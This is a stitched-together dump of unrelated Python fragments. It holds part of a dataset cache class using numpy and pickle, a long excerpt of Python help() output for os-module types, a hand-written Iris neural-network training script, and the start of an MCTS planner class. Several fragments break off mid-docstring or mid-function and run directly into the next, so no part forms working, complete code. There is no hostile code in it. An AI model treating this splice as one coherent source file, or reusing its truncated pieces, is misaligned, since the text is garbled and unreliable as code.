"""
# if a cached category folder does exist
if not self.is_empty(category, data_keys):
if data_keys is None:
log.log("Loading everything from cached category {}".format(category))
else:
log.log("Loading {} from cached category {}".format(category, data_keys))
loaded_data = dict()
for file_name in os.listdir(self._base_path(category)):
key = os.path.splitext(file_name)[0]
if data_keys is None or key in data_keys:
if file_name.endswith(".npy"):
loaded_data[key] = np.load(self._base_path(category, key))
elif file_name.endswith(".p"):
with open(self._base_path(category, key, ".p"), "rb") as input_file:
loaded_data[key] = pickle.load(input_file)
log.log(".. category {} has been loaded successfully from the cache".format(category))
return loaded_data
else:
if data_keys is None:
log.log("Cache for category {} is completely empty".format(
category
))
else:
log.log("Cache for category {} and data keys {} is empty".format(
category,
data_keys
))
return None
def load_single(self, category: str, data_key: str):
"""Load only a single data file from the cached category.
:param category: The category which should be partially loaded.
:param data_key: A key describing the specific element of the given category.
:return: None, if no such element has been cached.
"""
result_list = self.load(category, [data_key])
if result_list is not None:
result_list = result_list[data_key]
return result_list
def is_empty(self, category: str, data_keys=None) -> bool:
"""Check whether any (specific) data for category has been cached.
:param category: The category which should be checked.
:param data_keys: If None, just any data needs to exist. Otherwise, at least one file specified by the data_keys.
:return:
"""
category_dir_exists = os.path.isdir(self._base_path(category))
if category_dir_exists and data_keys is not None:
is_empty = True
for file_name in os.listdir(self._base_path(category)):
key = os.path.splitext(file_name)[0]
if key in data_keys:
is_empty = False
break
else:
is_empty = not category_dir_exists
return is_empty
def save(self, category: str, data, suffix_extension=".npy"):
"""Save an arbitrary category to the cache.
Currently, all elements of data must use the same suffix_extension.
:param category: The category which should be saved.
:param data: The actual data that should be cached.
:param suffix_extension: The file extension. Either ".npy" or ".p".
:return:
"""
# create folder for this category
if not os.path.exists(self._base_path(category)):
os.makedirs(self._base_path(category))
# each element of the data dictionary to a separate file
for key, value in data.items():
log.log(" .. saving {}.{}".format(
category,
key
))
if suffix_extension == ".npy":
np.save(self._base_path(category, key, suffix_extension), value)
else:
with open(self._base_path(category, key, ".p"), "wb") as output_file:
pickle.dump(value, output_file)
# additional log message to signal the end of this category cache. but only, if there is more than one file
if len(data) > 1:
log.log(".. saved {}".format(category))
def save_single(self, category, data_key, data_value, suffix_extension=".npy"):
"""Save only a single data file of a category."""
self.save(category, {data_key: data_value}, suffix_extension)
def save_dataset(self, dataset_key: str, x: np.ndarray, y: np.ndarray, preprocessor: Preprocessor):
"""Cache the specified dataset.
Does not work directly with a Dataset object, so that python lists of x and y can be saved before they are
converted to numpy arrays. The latter cannot happen in place and might cause a memory error, while saving
them to disk first results in an automatic conversion to numpy arrays that does not need the extra memory.
:param dataset_key: The key identifying the dataset which should be saved.
:param x: The raw data of the associated dataset.
:param y: The label data of the associated dataset.
:param preprocessor: The preprocessor of the associated dataset.
:return:
"""
# create folder for this dataset
if not os.path.exists(self._ds_path(dataset_key)):
os.makedirs(self._ds_path(dataset_key))
data_np = dict()
data_np[self.KEY_CACHE_VERSION] = self._cache_version
# do not save the complete dataset object, but X and Y.
# this way the calculated data will be restored, but parameters for splitting etc. can be refreshed
data_np[self.KEY_DATA_X] = x
data_np[self.KEY_DATA_Y] = y
# add the complete current configuration to ensure that no information about the loaded dataset are missing
data_np[self.KEY_CONFIG] = cf._cf
# save each element of the dictionary to a separate file
for key, value in data_np.items():
np.save(self._ds_path(dataset_key, key), value)
# pickle instead of numpy
data_pickle = dict()
# store further dataset class attributes
# TODO do not use private vars
data_pickle[self.KEY_NEXT_NEW_IID] = Dataset._next_new_iid
data_pickle[self.KEY_LABEL_IDS] = Dataset._label_internal_ids
data_pickle[self.KEY_LABEL_NAME_BY_ID] = Dataset._label_name_by_internal_id
data_pickle[self.KEY_LABEL_ID_BY_NAME] = Dataset._label_internal_id_by_name
data_pickle[self.KEY_PREPROCESSOR] = preprocessor
for key, value in data_pickle.items():
with open(self._ds_path(dataset_key, key, ".p"), "wb") as output_file:
pickle.dump(value, output_file)
log.log("Cached dataset " + dataset_key)
# save copy of current log file, but don't flush
log.log_save(self._ds_path(dataset_key), flush=False)
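# Hedged usage sketch (x, y, preprocessor and the dataset key are assumed to
# come from the caller's loading pipeline):
#
#   cache = Cache()  # singleton metaclass: every call returns the same instance
#   cache.save_dataset("oasis_train", x, y, preprocessor)
#   restored = cache.load_dataset("oasis_train")
#   if restored is not None:
#       x, y = restored[Cache.KEY_DATA_X], restored[Cache.KEY_DATA_Y]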
def _count_old_cache_version_folders(self) -> int:
"""Get the number of | |
| Return self!=value.
|
| __rmul__(self, value, /)
| Return self*value.
|
| __sizeof__(...)
| T.__sizeof__() -- size of T in memory, in bytes
|
| count(...)
| T.count(value) -> integer -- return number of occurrences of value
|
| index(...)
| T.index(value, [start, [stop]]) -> integer -- return first index of value.
| Raises ValueError if the value is not present.
class terminal_size(builtins.tuple)
| A tuple of (columns, lines) for holding terminal window size
|
| Method resolution order:
| terminal_size
| builtins.tuple
| builtins.object
|
| Methods defined here:
|
| __new__(*args, **kwargs) from builtins.type
| Create and return a new object. See help(type) for accurate signature.
|
| __reduce__(...)
|
| __repr__(self, /)
| Return repr(self).
|
| ----------------------------------------------------------------------
| Data descriptors defined here:
|
| columns
| width of the terminal window in characters
|
| lines
| height of the terminal window in characters
|
| ----------------------------------------------------------------------
| Data and other attributes defined here:
|
| n_fields = 2
|
| n_sequence_fields = 2
|
| n_unnamed_fields = 0
|
| ----------------------------------------------------------------------
| Methods inherited from builtins.tuple:
|
| __add__(self, value, /)
| Return self+value.
|
| __contains__(self, key, /)
| Return key in self.
|
| __eq__(self, value, /)
| Return self==value.
|
| __ge__(self, value, /)
| Return self>=value.
|
| __getattribute__(self, name, /)
| Return getattr(self, name).
|
| __getitem__(self, key, /)
| Return self[key].
|
| __getnewargs__(...)
|
| __gt__(self, value, /)
| Return self>value.
|
| __hash__(self, /)
| Return hash(self).
|
| __iter__(self, /)
| Implement iter(self).
|
| __le__(self, value, /)
| Return self<=value.
|
| __len__(self, /)
| Return len(self).
|
| __lt__(self, value, /)
| Return self<value.
|
| __mul__(self, value, /)
|      Return self*value.
|
| __ne__(self, value, /)
| Return self!=value.
|
| __rmul__(self, value, /)
| Return self*value.
|
| __sizeof__(...)
| T.__sizeof__() -- size of T in memory, in bytes
|
| count(...)
| T.count(value) -> integer -- return number of occurrences of value
|
| index(...)
| T.index(value, [start, [stop]]) -> integer -- return first index of value.
| Raises ValueError if the value is not present.
class times_result(builtins.tuple)
| times_result: Result from os.times().
|
| This object may be accessed either as a tuple of
| (user, system, children_user, children_system, elapsed),
| or via the attributes user, system, children_user, children_system,
| and elapsed.
|
| See os.times for more information.
|
| Method resolution order:
| times_result
| builtins.tuple
| builtins.object
|
| Methods defined here:
|
| __new__(*args, **kwargs) from builtins.type
| Create and return a new object. See help(type) for accurate signature.
|
| __reduce__(...)
|
| __repr__(self, /)
| Return repr(self).
|
| ----------------------------------------------------------------------
| Data descriptors defined here:
|
| children_system
| system time of children
|
| children_user
| user time of children
|
| elapsed
| elapsed time since an arbitrary point in the past
|
| system
| system time
|
| user
| user time
|
| ----------------------------------------------------------------------
| Data and other attributes defined here:
|
| n_fields = 5
|
| n_sequence_fields = 5
|
| n_unnamed_fields = 0
|
| ----------------------------------------------------------------------
| Methods inherited from builtins.tuple:
|
| __add__(self, value, /)
| Return self+value.
|
| __contains__(self, key, /)
| Return key in self.
|
| __eq__(self, value, /)
| Return self==value.
|
| __ge__(self, value, /)
| Return self>=value.
|
| __getattribute__(self, name, /)
| Return getattr(self, name).
|
| __getitem__(self, key, /)
| Return self[key].
|
| __getnewargs__(...)
|
| __gt__(self, value, /)
| Return self>value.
|
| __hash__(self, /)
| Return hash(self).
|
| __iter__(self, /)
| Implement iter(self).
|
| __le__(self, value, /)
| Return self<=value.
|
| __len__(self, /)
| Return len(self).
|
| __lt__(self, value, /)
| Return self<value.
|
| __mul__(self, value, /)
|      Return self*value.
|
| __ne__(self, value, /)
| Return self!=value.
|
| __rmul__(self, value, /)
| Return self*value.
|
| __sizeof__(...)
| T.__sizeof__() -- size of T in memory, in bytes
|
| count(...)
| T.count(value) -> integer -- return number of occurrences of value
|
| index(...)
| T.index(value, [start, [stop]]) -> integer -- return first index of value.
| Raises ValueError if the value is not present.
class uname_result(builtins.tuple)
| uname_result: Result from os.uname().
|
| This object may be accessed either as a tuple of
| (sysname, nodename, release, version, machine),
| or via the attributes sysname, nodename, release, version, and machine.
|
| See os.uname for more information.
|
| Method resolution order:
| uname_result
| builtins.tuple
| builtins.object
|
| Methods defined here:
|
| __new__(*args, **kwargs) from builtins.type
| Create and return a new object. See help(type) for accurate signature.
|
| __reduce__(...)
|
| __repr__(self, /)
| Return repr(self).
|
| ----------------------------------------------------------------------
| Data descriptors defined here:
|
| machine
| hardware identifier
|
| nodename
| name of machine on network (implementation-defined)
|
| release
| operating system release
|
| sysname
| operating system name
|
| version
| operating system version
|
| ----------------------------------------------------------------------
| Data and other attributes defined here:
|
| n_fields = 5
|
| n_sequence_fields = 5
|
| n_unnamed_fields = 0
|
| ----------------------------------------------------------------------
| Methods inherited from builtins.tuple:
|
| __add__(self, value, /)
| Return self+value.
|
| __contains__(self, key, /)
| Return key in self.
|
| __eq__(self, value, /)
| Return self==value.
|
| __ge__(self, value, /)
| Return self>=value.
|
| __getattribute__(self, name, /)
| Return getattr(self, name).
|
| __getitem__(self, key, /)
| Return self[key].
|
| __getnewargs__(...)
|
| __gt__(self, value, /)
| Return self>value.
|
| __hash__(self, /)
| Return hash(self).
|
| __iter__(self, /)
| Implement iter(self).
|
| __le__(self, value, /)
| Return self<=value.
|
| __len__(self, /)
| Return len(self).
|
| __lt__(self, value, /)
| Return self<value.
|
| __mul__(self, value, /)
|      Return self*value.
|
| __ne__(self, value, /)
| Return self!=value.
|
| __rmul__(self, value, /)
| Return self*value.
|
| __sizeof__(...)
| T.__sizeof__() -- size of T in memory, in bytes
|
| count(...)
| T.count(value) -> integer -- return number of occurrences of value
|
| index(...)
| T.index(value, [start, [stop]]) -> integer -- return first index of value.
| Raises ValueError if the value is not present.
FUNCTIONS
_exit(...)
_exit(status)
Exit to the system with specified status, without normal exit processing.
abort(...)
abort() -> does not return!
Abort the interpreter immediately. This 'dumps core' or otherwise fails
in the hardest way possible on the hosting operating system.
access(path, mode, *, dir_fd=None, effective_ids=False, follow_symlinks=True)
Use the real uid/gid to test for access to a path.
path
Path to be tested; can be string, bytes, or open-file-descriptor int.
mode
Operating-system mode bitfield. Can be F_OK to test existence,
or the inclusive-OR of R_OK, W_OK, and X_OK.
dir_fd
If not None, it should be a file descriptor open to a directory,
and path should be relative; path will then be relative to that
directory.
effective_ids
If True, access will use the effective uid/gid instead of the real uid/gid.
"""
Created on Thu Oct 24 15:06:36 2019
@author: <NAME>
"""
import numpy as np
import matplotlib.pyplot as plt
from sklearn.datasets import load_iris
from sklearn.neighbors import KNeighborsClassifier
from sklearn.model_selection import train_test_split
from sklearn.metrics import accuracy_score
from sklearn import preprocessing
from sklearn.preprocessing import normalize
# Sigmoid Function
def sigmoid(x):
return 1 / (1 + np.exp(-x))
# Derivative of Sigmoid Function
def derivative_sigmoid(x):
return x * (1 - x)
def softmax(x):
expA = np.exp(x)
return expA / expA.sum(axis=1, keepdims=True)
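# Quick sanity checks for the helpers above (values rounded):
#   sigmoid(0.0) == 0.5, derivative_sigmoid(0.5) == 0.25
#   softmax(np.array([[1.0, 1.0, 1.0]])) -> [[1/3, 1/3, 1/3]] (each row sums to 1)
# Note: derivative_sigmoid expects the sigmoid *output*, not the pre-activation.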
#Iris dataset
np.random.seed(42)
# Load dataset.
iris = load_iris()
inputs, output = iris.data, iris.target
#split data into training and test data.
X1, test_X, train_y, test_y = train_test_split(inputs, output, train_size=0.8, test_size=0.2, random_state=123)
##train data
y1 = np.reshape(train_y, (120,1))
y= np.zeros((120, 3))
for i in range(120):
y[i, y1[i]] = 1
X=normalize(X1, axis=0)
## test data
Xt=normalize(test_X, axis=0)
aXt = np.zeros((len(X), 4),float)
aXt[0:len(Xt),0:4] = Xt
y1t= np.reshape(test_y, (30,1))
yt=np.zeros((30,3))
for l in range(30):
yt[l, y1t[l]] = 1
# parameters
epoch = 10000 # number of training iterations
learning_rate = 0.01
# Dimensions of each layer
d_in = X.shape[1] # number of features in the input dataset
d_h1 = 4 # upper bound: max number of neurons per hidden layer + 1
d_out = 3 # output layer
# upper bound on the number of hidden-layer configurations to try
nhlayers1 = 5
accuracy = np.zeros((10, 10),float)
for nhlayers in range(nhlayers1):
for d_h in range(1,d_h1):
print("neuronas", d_h, "layer", nhlayers)
total_correct = 0
if nhlayers < 3:
# 1 hidden layer
if nhlayers == 0:
wh = np.random.uniform(size=(d_in, d_h))
bh = np.random.uniform(size=(1, d_h))
wout = np.random.uniform(size=(d_h, d_out))
bout = np.random.uniform(size=(1, d_out))
for i in range(epoch):
# Forward pass
h = sigmoid(X.dot(wh) + bh)
y_pred = softmax(h.dot(wout) + bout)
# Compute and print loss
#loss = (y_pred - y).sum()
sum_score = 0.0
for t in range(len(y)):
for l in range(len(y[t])):
sum_score += y[t][l]*np.log(1e-15 + y_pred[t][l])
mean_sum_score = 1.0/ len(y)*sum_score
#loss = np.sum(-y * np.log(y_pred))
if i % 1 == 0:
print('Epoch', i, ':', -mean_sum_score)
# Backpropagation to compute gradients
grad_y_pred = (y - y_pred) #* derivative_sigmoid(y_pred)
grad_wout = h.T.dot(grad_y_pred)
grad_bout = np.sum(grad_y_pred, axis=0, keepdims=True)
grad_h = grad_y_pred.dot(wout.T) * derivative_sigmoid(h)
grad_wh = X.T.dot(grad_h)
grad_bh = np.sum(grad_h, axis=0, keepdims=True)
# Update weights and biases
wout += grad_wout * learning_rate
bout += grad_bout * learning_rate
wh += grad_wh * learning_rate
bh += grad_bh * learning_rate
#test
h = sigmoid(Xt.dot(wh) + bh)
y_predt = softmax(h.dot(wout) + bout)
for n in range(len(Xt)):
if (np.argmax(yt, axis=1)[n] == np.argmax(y_predt, axis=1)[n]):
total_correct += 1
accuracy[nhlayers,d_h-1] = total_correct/len(Xt)*100
# 2 hidden layer
elif nhlayers == 1:
wh = np.random.uniform(size=(d_in, d_h))
bh = np.random.uniform(size=(1, d_h))
wh1 = np.random.uniform(size=(d_h, d_h))
bh1 = np.random.uniform(size=(1, d_h))
wout = np.random.uniform(size=(d_h, d_out))
bout = np.random.uniform(size=(1, d_out))
for i in range(epoch):
# Forward pass
h = sigmoid(X.dot(wh) + bh)
h1 = sigmoid(h.dot(wh1)+ bh1)
y_pred = softmax(h1.dot(wout) + bout)
# Compute and print loss
#loss = (y_pred - y).sum()
sum_score = 0.0
for t in range(len(y)):
for l in range(len(y[t])):
sum_score += y[t][l]*np.log(1e-15 + y_pred[t][l])
mean_sum_score = 1.0/ len(y)*sum_score
#loss = np.sum(-y * np.log(y_pred))
if i % 1 == 0:
print('Epoch', i, ':', -mean_sum_score)
# Backpropagation to compute gradients
grad_y_pred = (y - y_pred) #* derivative_sigmoid(y_pred)
grad_wout = h1.T.dot(grad_y_pred)
grad_bout = np.sum(grad_y_pred, axis=0, keepdims=True)
grad_h1 = grad_y_pred.dot(wout.T) * derivative_sigmoid(h1)
grad_wh1 = h.T.dot(grad_h1)
grad_bh1 = np.sum(grad_h1, axis=0, keepdims=True)
grad_h = grad_h1.dot(wh1.T) * derivative_sigmoid(h)
grad_wh = X.T.dot(grad_h)
grad_bh = np.sum(grad_h, axis=0, keepdims=True)
# Update weights and biases
wout += grad_wout * learning_rate
bout += grad_bout * learning_rate
wh1 += grad_wh1 * learning_rate
bh1 += grad_bh1 * learning_rate
wh += grad_wh * learning_rate
bh += grad_bh * learning_rate
#test
h = sigmoid(Xt.dot(wh) + bh)
h1 = sigmoid(h.dot(wh1)+ bh1)
y_predt = softmax(h1.dot(wout) + bout)
for n in range(len(Xt)):
if (np.argmax(yt, axis=1)[n] == np.argmax(y_predt, axis=1)[n]):
total_correct += 1
accuracy[nhlayers,d_h-1] = total_correct/len(Xt)*100
# 3 hidden layer
else:
wh = np.random.uniform(size=(d_in, d_h))
bh = np.random.uniform(size=(1, d_h))
wh1 = np.random.uniform(size=(d_h, d_h))
bh1 = np.random.uniform(size=(1, d_h))
wh2 = np.random.uniform(size=(d_h, d_h))
bh2 = np.random.uniform(size=(1, d_h))
wout = np.random.uniform(size=(d_h, d_out))
bout = np.random.uniform(size=(1, d_out))
for i in range(epoch):
# Forward pass
h = sigmoid(X.dot(wh) + bh)
h1 = sigmoid(h.dot(wh1) + bh1)
h2 = sigmoid(h1.dot(wh2)+ bh2)
y_pred = softmax(h2.dot(wout) + bout)
# Compute and print loss
#loss = (y_pred - y).sum()
sum_score = 0.0
for t in range(len(y)):
for l in range(len(y[t])):
sum_score += y[t][l]*np.log(1e-15 + y_pred[t][l])
mean_sum_score = 1.0/ len(y)*sum_score
loss = np.sum(-y * np.log(y_pred))
if i % 1 == 0:
print('Epoch', i, ':', -mean_sum_score)
# Backpropagation to compute gradients
grad_y_pred = (y - y_pred) #* derivative_sigmoid(y_pred)
grad_wout = h2.T.dot(grad_y_pred)
grad_bout = np.sum(grad_y_pred, axis=0, keepdims=True)
grad_h2 = grad_y_pred.dot(wout.T) * derivative_sigmoid(h2)
grad_wh2 = h1.T.dot(grad_h2)
grad_bh2 = np.sum(grad_h2, axis=0, keepdims=True)
grad_h1 = grad_h2.dot(wh2.T) * derivative_sigmoid(h1)
grad_wh1 = h.T.dot(grad_h1)
grad_bh1 = np.sum(grad_h1, axis=0, keepdims=True)
grad_h = grad_h1.dot(wh1.T) * derivative_sigmoid(h)
grad_wh = X.T.dot(grad_h)
grad_bh = np.sum(grad_h, axis=0, keepdims=True)
# Update weights and biases
wout += grad_wout * learning_rate
bout += grad_bout * learning_rate
wh2 += grad_wh2 * learning_rate
bh2 += grad_bh2 * learning_rate
wh1 += grad_wh1 * learning_rate
bh1 += grad_bh1 * learning_rate
wh += grad_wh * learning_rate
bh += grad_bh * learning_rate
#test
h = sigmoid(Xt.dot(wh) + bh)
h1 = sigmoid(h.dot(wh1) + bh1)
h2 = sigmoid(h1.dot(wh2)+ bh2)
y_predt = softmax(h2.dot(wout) + bout)
for n in range(len(Xt)):
if (np.argmax(yt, axis=1)[n] == np.argmax(y_predt, axis=1)[n]):
total_correct += 1
accuracy[nhlayers,d_h-1] = total_correct/len(Xt)*100
# From 4 hidden layer to nhlayer+1
else:
### Neural network hidden layer_1,.., layer_nhlayers+1 ==> from 4 hidden layers
###LAYERS
# Matrix zeros for hidden layers
hweightmatrix = np.zeros((d_h,d_h,nhlayers),float)
hbiasmatrix = np.zeros((1,d_h,nhlayers),float)
# Weight and bias initialization hidden layer_1
wh = np.random.uniform(size=(d_in, d_h))
bh = np.random.uniform(size=(1, d_h))
#Weight and bias initialization hidden layer_2, layer_3, ...., layer_nhleyrs
for i in range(nhlayers):
hweightmatrix[:,:,i] = np.random.uniform(size=(d_h, d_h))
hbiasmatrix[:,:,i] = np.random.uniform(size=(1, d_h))
#Weight and bias initialization output layer
wout = np.random.uniform(size=(d_h, d_out))
bout = np.random.uniform(size=(1, d_out))
# Training buffers: hActivationMatrix = per-layer outputs, hgradmatrix = local gradients,
# hgradweightmatrix = weight gradients (local gradient * layer input), hgradbiasmatrix = bias gradients
hActivationMatrix = np.zeros((len(X),d_h,nhlayers),float)
hgradmatrix = np.zeros((len(X),d_h,nhlayers),float)
hgradweightmatrix = np.zeros((d_h,d_h,nhlayers),float)
hgradbiasmatrix = np.zeros((1,d_h,nhlayers),float)
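# Reading aid (comments only): the first hidden layer keeps its own wh of shape
# (d_in, d_h) and bh of shape (1, d_h); hidden layers 2..nhlayers+1 are stored
# along the last axis of the 3-D buffers above, e.g. hweightmatrix[:, :, j] is
# a (d_h, d_h) weight matrix and hActivationMatrix[:, :, j] holds that layer's
# (len(X), d_h) activations. The forward and backward loops below just walk
# that last axis.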
##Train
for i in range(epoch):
## Forward pass
# Hidden layer_1 output
h = sigmoid(X.dot(wh) + bh) # First layer activation or h
# Hidden layer_2 output
hActivationMatrix[:,:,0] = sigmoid(h.dot(hweightmatrix[:,:,0]) + hbiasmatrix[:,:,0])
# Hidden layer_3,..., Layer_nhlayers outputs
for j in range(1,nhlayers):
hActivationMatrix[:,:,j] = sigmoid(hActivationMatrix[:,:,j-1].dot(hweightmatrix[:,:,j]) + hbiasmatrix[:,:,j])
# Last layer output or y_pred
y_pred = softmax(hActivationMatrix[:,:,-1].dot(wout) + bout)
# Compute and print loss
sum_score = 0.0
for t in range(len(y)):
for l in range(len(y[t])):
sum_score += y[t][l]*np.log(1e-15 + y_pred[t][l])
mean_sum_score = 1.0/ len(y)*sum_score
#
#loss1 = (y_pred - y).sum()
#loss2 = np.sum(-y * np.log(y_pred))
if i % 1 == 0:
print('Epoch', i, ':', -mean_sum_score)
# print('Epoch2', i, ':', loss2)
## Backpropagation to compute gradients
# Output layer
grad_y_pred = (y - y_pred) #* derivative_sigmoid(y_pred) # Local gradient
grad_wout = hActivationMatrix[:,:,-1].T.dot(grad_y_pred) # Local gradiente * input to the layer
grad_bout = np.sum(grad_y_pred, axis=0, keepdims=True) # Gradient bias
# Local gradient Hidden layer_nhlayer
hgradmatrix[:,:,0] = grad_y_pred.dot(wout.T) * derivative_sigmoid(hActivationMatrix[:,:,-1])
hgradweightmatrix[:,:,0] = hActivationMatrix[:,:,-2].T.dot(hgradmatrix[:,:,0])
hgradbiasmatrix[:,:,0] = np.sum(hgradmatrix[:,:,0], axis=0, keepdims=True)
# Local gradient hidden layer_nhlayer-1,..., layer_3
for j in range(1,nhlayers-1):
hgradmatrix[:,:,j] = hgradmatrix[:,:,j-1].dot(hweightmatrix[:,:,-j].T) * derivative_sigmoid(hActivationMatrix[:,:,-j-1])
hgradweightmatrix[:,:,j] = hActivationMatrix[:,:,-j-2].T.dot(hgradmatrix[:,:,j])
hgradbiasmatrix[:,:,j] = np.sum(hgradmatrix[:,:,j], axis=0, keepdims=True)
# Local gradient hidden layer_2
hgradmatrix[:,:,-1] = hgradmatrix[:,:,-2].dot(hweightmatrix[:,:,-2].T) * derivative_sigmoid(hActivationMatrix[:,:,0])
hgradweightmatrix[:,:,-1] = h.T.dot(hgradmatrix[:,:,-1])
hgradbiasmatrix[:,:,-1] = np.sum(hgradmatrix[:,:,-1], axis=0, keepdims=True)
# Local gradient hidden layer_1
grad_h = hgradmatrix[:,:,-1].dot(hweightmatrix[:,:,0].T) * derivative_sigmoid(h)
grad_wh = X.T.dot(grad_h)
grad_bh = np.sum(grad_h, axis=0, keepdims=True)
## Update weights and biases
# Output layer
wout += grad_wout * learning_rate
bout += grad_bout * learning_rate
# Hidden layer_2, ... , layer_nhlayer
for j in range(nhlayers):
hweightmatrix[:,:,-j-1] += hgradweightmatrix[:,:,j] * learning_rate
hbiasmatrix[:,:,-j-1] += hgradbiasmatrix[:,:,j] * learning_rate
# Hidden layer_1
wh += grad_wh * learning_rate
bh += grad_bh * learning_rate
#test
h = sigmoid(aXt.dot(wh) + bh) # First layer activation
<gh_stars>1-10
from copy import copy, deepcopy
from datetime import datetime
import itertools
import numpy as np
import pprint
import random
import time
from pma.pr_graph import *
from opentamp.policy_hooks.sample import Sample
from opentamp.policy_hooks.utils.policy_solver_utils import *
MAX_OPT_DEPTH = 30 # TODO: Make this more versatile
MCTS_WEIGHT = 10
class MixedPolicy:
def __init__(self, pol, dU, action_inds, state_inds, opt_traj, opt_strength):
self.pol = pol
self.dU = dU
self.action_inds = action_inds
self.state_inds = state_inds
self.opt_traj = opt_traj
self.opt_strength = opt_strength
def act(self, X, O, t, noise):
if self.opt_strength < 1e-2: return self.pol.act(X, O, t, noise)
# opt_u = np.zeros(self.dU)
# for param, attr in self.action_inds:
# opt_u[self.action_inds[param, attr]] = self.opt_traj[t, self.action_inds[param, attr]]
if noise is not None:
if len(self.pol.chol_pol_covar.shape) > 2:
opt_u = self.opt_traj[t] + self.pol.chol_pol_covar[t].T.dot(noise)
else:
opt_u = self.opt_traj[t] + self.pol.chol_pol_covar.T.dot(noise)
else:
opt_u = self.opt_traj[t]
assert not np.any(np.isnan(opt_u))
if np.any(np.isnan(opt_u)):
print(('ERROR NAN IN ACTION FOR OPT', t, self.opt_strength, self.opt_traj[t]))
opt_u[np.where(np.isnan(opt_u))] = 0.
if self.opt_strength > 1 - 1e-2: return opt_u.copy()
return self.opt_strength * opt_u + (1 - self.opt_strength) * self.pol.act(X, O, t, noise)
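# In short, act() returns the convex blend
#   opt_strength * opt_u + (1 - opt_strength) * pol.act(X, O, t, noise)
# with the two thresholds above short-circuiting to the pure learned policy
# (opt_strength < 0.01) or the pure optimized trajectory (opt_strength > 0.99).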
class MCTSNode():
def __init__(self, label, value, parent, num_tasks, prim_dims, tree=None):
self.label = label
self.value = value
self.num_tasks = num_tasks
self.prim_dims = prim_dims
self.prim_order = list(prim_dims.keys())
self.num_prims = list(prim_dims.values())
self.is_leaf = True
self.children = {}
label_options = itertools.product(list(range(num_tasks)), *[list(range(n)) for n in self.num_prims])
for option in label_options:
self.children[option] = None
self.parent = parent
self.n_explored = 1.0
self.n_child_explored = {label:0 for label in self.children}
self.sample_links = {}
self.sample_to_traj = {}
self.depth = parent.depth + 1 if parent != None else 0
self.tree = tree
if parent is not None:
parent.add_child(self)
self.tree = parent.tree
self.valid = True
self.failures = {}
def erase(self):
self.valid = False
self.tree = None
self.sample_links = {}
self.sample_to_traj = {}
for child in list(self.children.values()):
if child is not None:
child.erase()
self.children = {}
self.failures = {}
def is_root(self):
return self.parent is None or self.parent is self
def is_leaf(self):
return self.is_leaf
def get_task(self):
return self.label[0]
def get_prim(self, prim_name):
return self.label[self.prim_order.index(prim_name)+1]
def update_value(self, new_value):
# self.value = (self.value*self.n_explored + new_value) / (self.n_explored + 1)
# if new_value == 0:
# new_value = 1
# else:
# new_value = 0
self.value = (self.value*self.n_explored + new_value) / (self.n_explored + 1)
self.n_explored += 1
if self.tree is not None: self.tree.n_explored[self.label] += 1
def update_n_explored(self):
self.n_explored += 1
def update_child_explored(self, child_label):
child_label = tuple(child_label)
self.n_child_explored[child_label] += 1
def get_child(self, label):
return self.children[tuple(label)]
def add_child(self, child):
self.children[child.label] = child
child.parent = self
self.is_leaf = False
def get_explored_children(self):
return [n for n in list(self.children.values()) if n is not None]
def has_unexplored(self):
for child in list(self.children.values()):
if child is None: return True
return False
def __repr__(self):
return str(self.label)
class MCTS:
def __init__(self, tasks, prim_dims, gmms, value_f, prob_f, condition, agent, branch_factor, num_samples, num_distilled_samples, choose_next=None, sim_from_next=None, soft_decision=False, C=2e-1, max_depth=20, explore_depth=5, opt_strength=0.0, log_prefix=None, tree_id=0, curric_thresh=-1, n_thresh=-1, her=False, onehot_task=False, soft=False, ff_thresh=0, eta=1.):
self.tasks = tasks
self.num_tasks = len(self.tasks)
self.prim_dims = prim_dims
self.prim_order = list(prim_dims.keys())
self.num_prims = list(prim_dims.values())
self.max_depth = max_depth
self._max_depth = max_depth
self.explore_depth = explore_depth
self.agent = agent
self.soft_decision = soft_decision
self._soft = soft
self.eta = eta
self.ff_thresh = ff_thresh
self.C = C # Standard is to use 2 but given difficulty of finding good paths, using smaller
self.branch_factor = branch_factor
self.num_samples = 1
self.num_distilled_samples = num_distilled_samples
self._choose_next = self._default_choose_next if choose_next is None else choose_next
self._simulate_from_next = self._default_simulate_from_next if sim_from_next is None else sim_from_next
self._value_f = value_f
self._prob_f = prob_f
self._switch_f = None
self._permute = 0
# self.node_check_f = lambda n: n.value/n.n_explored+self.C*np.sqrt(np.log(n.parent.n_explored)/n.n_explored) if n != None else -np.inf
self.start_t = time.time()
self.opt_strength = opt_strength
self.her = her
self.onehot_task = onehot_task
self.curric_thresh = curric_thresh
self.n_thresh = n_thresh
self.cur_curric = 1 if curric_thresh > 0 else 0
if self.cur_curric != 0:
self.max_depth = curric_thresh
self.val_per_run = []
self.first_suc_buf = []
self.use_q = False
self.discrete_prim = True
self.n_resets = 0
self.n_runs = 0
self.reset(gmms, condition)
self.first_success = self.max_depth * 50
self.hl_suc = 0
self.hl_fail = 0
label_options = list(itertools.product(list(range(self.num_tasks)), *[list(range(n)) for n in self.num_prims]))
self.n_explored = {tuple(l): 0 for l in label_options}
self.label_options = label_options
self.log_file = log_prefix + '_paths.txt' if log_prefix is not None else None
self.verbose_log_file = log_prefix + '_verbose.txt' if log_prefix is not None else None
self.log_prefix = log_prefix
self._n_plans = None
if self.log_file is not None:
init_state = []
x = self.agent.x0[self.condition][self.agent._x_data_idx[STATE_ENUM]]
for param_name, attr in self.agent.state_inds:
inds = self.agent.state_inds[param_name, attr]
if inds[-1] < len(x):
init_state.append((param_name, attr, x[inds]))
with open(self.log_file, 'w+') as f:
f.write('Data for MCTS on initial state:')
f.write(str(init_state))
f.write('\n\n')
def add_log_file(self, log_prefix):
self.log_file = log_prefix + '_paths.txt' if log_prefix is not None else None
self.verbose_log_file = log_prefix + '_verbose.txt' if log_prefix is not None else None
self.log_prefix = log_prefix
if self.log_file is not None:
init_state = []
x = self.agent.x0[self.condition][self.agent._x_data_idx[STATE_ENUM]]
for param_name, attr in self.agent.state_inds:
inds = self.agent.state_inds[param_name, attr]
if inds[-1] < len(x):
init_state.append((param_name, attr, x[inds]))
with open(self.log_file, 'w+') as f:
f.write('\n')
with open(self.verbose_log_file, 'w+') as f:
f.write('\n')
def mark_failure(self, node, task):
if node is self.root:
self.root.failures[tuple(task)] = True
if len(list(self.root.failures.keys())) == len(list(self.root.children.keys())):
print(('BAD ROOT STATE; RESETTING ON {0}'.format(self.agent.x0[self.condition])))
self.reset()
def reset(self, gmms=None, condition=None):
if hasattr(self, 'root'):
self.root.erase()
self.root = MCTSNode((-1, -1, -1), 0, None, len(self.tasks), self.prim_dims, self)
self.root.parent = self.root
self.gmms = gmms
